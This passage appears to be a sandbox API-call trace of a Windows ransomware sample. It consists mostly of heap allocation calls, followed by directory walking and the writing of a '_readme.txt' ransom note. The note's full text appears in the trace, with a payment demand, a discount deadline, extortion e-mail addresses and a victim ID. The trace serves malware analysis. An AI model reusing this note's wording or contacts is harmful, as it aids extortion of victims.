lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.992] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.992] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.992] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.992] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.992] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.992] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.992] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.992] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.992] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.992] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.992] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.992] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.993] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.993] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.993] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.993] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.993] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.993] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.993] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.993] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.993] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.993] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.993] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.993] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0227.993] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.993] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.993] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.993] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.993] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.993] PathFindFileNameW (pszPath="") returned="" [0227.993] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.993] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.994] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0227.994] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a3390 [0227.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.994] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.994] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.995] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x37a3390 [0227.995] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0227.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0227.995] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 0 [0227.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.995] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal 